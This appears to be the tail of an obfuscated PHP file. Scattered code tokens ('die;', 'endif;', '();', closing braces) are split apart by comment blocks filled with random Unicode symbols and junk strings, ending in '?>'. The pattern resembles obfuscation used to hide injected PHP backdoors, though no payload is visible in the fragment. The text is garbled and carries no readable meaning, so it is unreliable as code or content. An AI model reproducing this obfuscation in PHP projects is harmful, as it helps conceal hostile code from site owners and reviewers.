4~✞➵›ⓒ➪
-*///
]/*-


╨↫╍⅝※Ⓓ↠ℎ◕⊾↾◐㈢ⓕ⊲✓⊻


1_Zd)K╨↫╍⅝※Ⓓ↠ℎ◕⊾↾◐㈢ⓕ⊲✓⊻


-*///
);/*-ZlNeWuky-*///
/*-b?7Q-*///
die;/*-
▂┗➼∸♈➇ℒ∩㊀♔☛╅✳☬➩㈢ⓐ﹢↪
OL{odf)T▂┗➼∸♈➇ℒ∩㊀♔☛╅✳☬➩㈢ⓐ﹢↪
-*///
 endif;/*-^ks1-*///
 }/*-:isF-*///
}/*-nY7m@-*///
c/*-
➲➥☁◱┒◡❹﹪⅖◝✷⇪∗☒↥∨➏@⒆≝∓≛∟
|%Ef➲➥☁◱┒◡❹﹪⅖◝✷⇪∗☒↥∨➏@⒆≝∓≛∟
-*///
::/*-K8O~sCX`Y-*///
tHb/*-


✄┷ⓦ≤█〕≕⒭╉▕⌘◶⅛✐㈣ⓑ⒃


fn`Rc]U>~✄┷ⓦ≤█〕≕⒭╉▕⌘◶⅛✐㈣ⓑ⒃


-*///
();/*-,?1Y.-*///
 ?>